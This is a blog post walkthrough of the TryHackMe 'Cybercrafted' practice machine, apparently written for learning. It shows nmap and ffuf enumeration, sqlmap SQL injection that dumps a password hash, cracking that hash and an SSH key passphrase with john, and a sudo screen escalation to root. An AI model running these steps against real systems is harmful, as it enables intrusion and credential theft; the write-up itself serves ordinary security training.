<!DOCTYPE html>

<!--
  portfolYOU Jekyll theme by yousinix
  Free for personal and commercial use under the MIT license
  https://github.com/yousinix/portfolYOU
-->

<html lang="en" class="h-100">

<head>

  
  
  

  

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <meta property="og:type" content="website">
  <meta property="og:title" content="Cybercrafted">
  <meta property="og:description" content="Tryhackme - Medium">
  <meta property="og:image" content="/assets/img/profile.png">

  <title>Cybercrafted</title>
  <meta name="description" content="Tryhackme - Medium">

  <link rel="shortcut icon" type="image/x-icon" href="/assets/favicon.ico">

  <!-- Theme style -->
  <script src="/assets/js/theme.js"></script>

  <!-- Font Awesome CDN -->
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css">

  <!-- Bootstrap CSS CDN -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css">

  <!-- Animate CSS CDN -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.7.0/animate.css">

  <!-- Custom CSS -->
  <link rel="stylesheet" href="/assets/css/style.css">

</head>


<body class="h-100 d-flex flex-column">

  <main class="flex-shrink-0 container mt-5">
    <nav class="navbar navbar-expand-lg navbar-themed">

  <a class="navbar-brand" href="/"><h5><b>Akshay Chavan</b></h5></a>

  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavAltMarkup" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
    <i class="fas fa-1x fa-bars text-themed"></i>
  </button>

  <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
    <div class="navbar-nav ml-auto"><a class="nav-item nav-link " href="/projects/">Projects</a>

      <a class="nav-item nav-link active" href="/blog/">Blog</a>

      <a class="nav-item nav-link " href="/about/">About</a>

      

      <span id="theme-toggler" class="nav-item nav-link" role="button" onclick="toggleTheme()"></span>
    </div>
  </div>

</nav>
    <div class="col-lg-10 mx-auto mt-5 markdown-body">
  <h1><b>Cybercrafted</b></h1>

<p class="post-metadata text-muted">
  01 November 2023 -  
  <b>4 mins read time</b>

  <br>Tags: 
    
    <a class="text-decoration-none no-underline" href="/blog/tags#http">
      <span class="tag badge badge-pill text-primary border border-primary">http</span>
    </a>
    
    <a class="text-decoration-none no-underline" href="/blog/tags#sqlinjection">
      <span class="tag badge badge-pill text-primary border border-primary">sqlinjection</span>
    </a>
    
    <a class="text-decoration-none no-underline" href="/blog/tags#sudo">
      <span class="tag badge badge-pill text-primary border border-primary">sudo</span>
    </a>
    </p>

<p><img src="https://tryhackme-images.s3.amazonaws.com/room-icons/dd06737472c79a806e2049ddeb3af354.png" alt="infocard" /></p>

<h2 id="introduction">Introduction</h2>

<p>CyberCrafted is a pay-to-win Minecraft server that involves exploiting SQL injection, weak credentials, and misconfigured permissions to gain root access. This walkthrough will guide you through the process of compromising the CyberCrafted server, from initial reconnaissance to gaining root access.</p>

<h2 id="initial-enumeration">Initial Enumeration</h2>

<h3 id="nmap-scan">Nmap Scan</h3>

<p>The first step in any penetration test is enumeration. We start by scanning the target machine using Nmap to identify open ports and services.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sV</span> <span class="nt">-sC</span> <span class="nt">-p-</span> 10.10.61.207 <span class="o">&gt;</span> nmap/service.log
</code></pre></div></div>

<p><strong>Nmap Results:</strong></p>

<pre><code class="language-nmap">Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 23:54 EST
Nmap scan report for cybercrafted.thm (10.10.61.207)
Host is up (0.17s latency).

PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:36:ce:b9:ac:72:8a:d7:a6:b7:8e:45:d0:ce:3c:00 (RSA)
|   256 e9:e7:33:8a:77:28:2c:d4:8c:6d:8a:2c:e7:88:95:30 (ECDSA)
|_  256 76:a2:b1:cf:1b:3d:ce:6c:60:f5:63:24:3e:ef:70:d8 (ED25519)
80/tcp    open  http      Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cybercrafted
25565/tcp open  minecraft Minecraft 1.7.2 (Protocol: 127, Message: ck00r lcCyberCraftedr ck00rrck00r e-TryHackMe-r  ck00r, Users: 0/1)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.57 seconds
</code></pre>

<p><strong>Key Services Identified:</strong></p>

<ul>
  <li><strong>SSH (22):</strong> OpenSSH 7.6p1</li>
  <li><strong>HTTP (80):</strong> Apache httpd 2.4.29</li>
  <li><strong>Minecraft (25565):</strong> Minecraft 1.7.2</li>
</ul>

<h3 id="web-enumeration">Web Enumeration</h3>

<p>Visiting the HTTP service on port 80 revealed a static image. We added <code class="language-plaintext highlighter-rouge">cybercrafted.thm</code> to our <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file to resolve the domain.</p>

<p><strong>Webpage:</strong></p>

<p><img src="/assets/ctf/media/index_page.png" alt="Index Page" /></p>

<p><strong>HTML Comment:</strong></p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- A Note to the developers: Just finished up adding other subdomains, now you can work on them! --&gt;</span>
</code></pre></div></div>

<h3 id="subdomain-enumeration">Subdomain Enumeration</h3>

<p>Using <code class="language-plaintext highlighter-rouge">ffuf</code>, we discovered three subdomains:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ffuf <span class="nt">-w</span> /usr/share/wordlist/dirb/common.md <span class="nt">-u</span> http://cybercrafted.thm/ <span class="nt">-H</span> <span class="s2">"Host: FUZZ.cybercrafted.thm"</span>
</code></pre></div></div>

<p><strong>Subdomains Identified:</strong></p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">www</code></li>
  <li><code class="language-plaintext highlighter-rouge">store</code></li>
  <li><code class="language-plaintext highlighter-rouge">admin</code></li>
</ul>

<p><strong>Admin Login Page:</strong></p>

<p><img src="/assets/ctf/media/admin_login.png" alt="Admin Login Page" /></p>

<h2 id="exploiting-sql-injection">Exploiting SQL Injection</h2>

<h3 id="identifying-the-vulnerability">Identifying the Vulnerability</h3>

<p>The <code class="language-plaintext highlighter-rouge">/search.php</code> endpoint on <code class="language-plaintext highlighter-rouge">store.cybercrafted.thm</code> was vulnerable to SQL injection. We used <code class="language-plaintext highlighter-rouge">sqlmap</code> to exploit this vulnerability.</p>

<p><strong>Captured Request:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST /search.php HTTP/1.1
Host: store.cybercrafted.thm
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: http://store.cybercrafted.thm
Connection: close
Referer: http://store.cybercrafted.thm/search.php
Upgrade-Insecure-Requests: 1

search=testing&amp;submit=
</code></pre></div></div>

<p><strong>Exploiting with <code class="language-plaintext highlighter-rouge">sqlmap</code>:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sqlmap <span class="nt">-r</span> sqltest <span class="nt">--batch</span> <span class="nt">--dbs</span>
</code></pre></div></div>

<p><strong>Databases Identified:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapp
</code></pre></div></div>

<p><strong>Extracted Credentials:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xXUltimateCreeperXx:88b949dd5cdfbecb9f2ecbbfa24e5974234e7c01
</code></pre></div></div>

<p><strong>Cracking the Hash:</strong></p>

<p>Using <code class="language-plaintext highlighter-rouge">john</code>, we cracked the hash to reveal the password: <code class="language-plaintext highlighter-rouge">di*************9</code>.</p>

<h2 id="gaining-initial-access">Gaining Initial Access</h2>

<h3 id="logging-into-admin-panel">Logging into Admin Panel</h3>

<p>Using the credentials <code class="language-plaintext highlighter-rouge">xXUltimateCreeperXx:di*************9</code>, we logged into the admin panel at <code class="language-plaintext highlighter-rouge">admin.cybercrafted.thm</code>.</p>

<p><strong>Admin Panel:</strong></p>

<p><img src="/assets/ctf/media/admin_login.png" alt="Admin Panel" /></p>

<h3 id="extracting-ssh-key">Extracting SSH Key</h3>

<p>From the admin panel, we extracted the SSH private key for the user <code class="language-plaintext highlighter-rouge">xXUltimateCreeperXx</code>.</p>

<p><strong>SSH Key:</strong></p>

<p><img src="/assets/ctf/media/key.png" alt="SSH Key" /></p>

<h3 id="cracking-the-ssh-key">Cracking the SSH Key</h3>

<p>The SSH key was encrypted. We used <code class="language-plaintext highlighter-rouge">ssh2john</code> and <code class="language-plaintext highlighter-rouge">john</code> to crack the passphrase.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh2john id_rsa <span class="o">&gt;</span> <span class="nb">hash
</span>john <span class="nb">hash</span> <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlist/rockyou.txt
</code></pre></div></div>

<p><strong>Cracked Passphrase:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>c*********6
</code></pre></div></div>

<h3 id="ssh-access">SSH Access</h3>

<p>Using the SSH key and passphrase, we logged into the server as <code class="language-plaintext highlighter-rouge">xXUltimateCreeperXx</code>.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-i</span> id_rsa xXUltimateCreeperXx@10.10.61.207
</code></pre></div></div>

<h2 id="privilege-escalation">Privilege Escalation</h2>

<h3 id="escalating-to-cybercrafted">Escalating to <code class="language-plaintext highlighter-rouge">cybercrafted</code></h3>

<p>Enumerating the server, we discovered a Minecraft server running with a plugin called <code class="language-plaintext highlighter-rouge">loginsystem</code>. The plugin’s log file contained credentials for the <code class="language-plaintext highlighter-rouge">cybercrafted</code> user.</p>

<p><strong>Log File:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt
</code></pre></div></div>

<p><strong>Extracted Credentials:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cybercrafted:J*****************k
</code></pre></div></div>

<h3 id="escalating-to-root">Escalating to <code class="language-plaintext highlighter-rouge">root</code></h3>

<p>The user <code class="language-plaintext highlighter-rouge">cybercrafted</code> had sudo permissions to run <code class="language-plaintext highlighter-rouge">/usr/bin/screen</code> as root.</p>

<p><strong>Sudo Permissions:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries <span class="k">for </span>cybercrafted on cybercrafted:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User cybercrafted may run the following commands on cybercrafted:
    <span class="o">(</span>root<span class="o">)</span> /usr/bin/screen <span class="nt">-r</span> cybercrafted
</code></pre></div></div>

<h3 id="exploiting-screen">Exploiting <code class="language-plaintext highlighter-rouge">screen</code></h3>

<p>Using <code class="language-plaintext highlighter-rouge">screen</code>, we created a new window with a root shell.</p>

<p><strong>Creating a New Window:</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo</span> /usr/bin/screen <span class="nt">-r</span> cybercrafted
</code></pre></div></div>

<p><strong>Shortcut:</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ctrl+a+c
</code></pre></div></div>

<p><strong>Root Shell Obtained:</strong></p>

<p><img src="/assets/ctf/media/root.png" alt="Root Shell" /></p>

<h2 id="conclusion">Conclusion</h2>

<p>The CyberCrafted Minecraft server was compromised through a combination of SQL injection, weak credentials, and misconfigured permissions. By methodically enumerating services and exploiting discovered vulnerabilities, we successfully compromised the server and gained root access. This walkthrough underscores the importance of thorough enumeration and the effective use of discovered vulnerabilities in penetration testing.</p>

<h2 id="resources">Resources</h2>

<ul>
  <li><a href="https://linuxize.com/post/how-to-use-linux-screen/">How To Use Linux Screen</a></li>
</ul>



</div>
  </main>
  <footer class="mt-auto py-3 text-center">

  <small class="text-muted mb-2">
    <i class="fas fa-code"></i> with <i class="fas fa-heart"></i>
    by <strong>Akshay Chavan</strong>
  </small>

  <div class="container-fluid justify-content-center"><a class="social mx-1"  href="mailto:akschavan100@gmail.com"
       style="color: #6c757d"
       onMouseOver="this.style.color='#db4437'"
       onMouseOut="this.style.color='#6c757d'">
      <i class="fas fa-envelope fa-1x"></i>
    </a><a class="social mx-1"  href="https://www.github.com/akshaychavan10"
       style="color: #6c757d"
       onMouseOver="this.style.color='#333333'"
       onMouseOut="this.style.color='#6c757d'">
      <i class="fab fa-github fa-1x"></i>
    </a><a class="social mx-1"  href="https://www.linkedin.com/in/akshaychavan07"
       style="color: #6c757d"
       onMouseOver="this.style.color='#007bb5'"
       onMouseOut="this.style.color='#6c757d'">
      <i class="fab fa-linkedin-in fa-1x"></i>
    </a>

</div><small id="attribution">
    theme <a href="https://github.com/yousinix/portfolYOU">portfolYOU</a>
  </small>

</footer>

  
  <!-- GitHub Buttons -->
<script async defer src="https://buttons.github.io/buttons.js"></script>

<!-- jQuery CDN -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<!-- Popper.js CDN -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.6/umd/popper.min.js"></script>

<!-- Bootstrap JS CDN -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>

<!-- wow.js CDN & Activation -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/wow/1.1.2/wow.js"></script>
<script> new WOW().init(); </script>

<!-- Initialize all tooltips -->
<script>
$(function () {
    $('[data-toggle="tooltip"]').tooltip()
})
</script>
</body>

</html>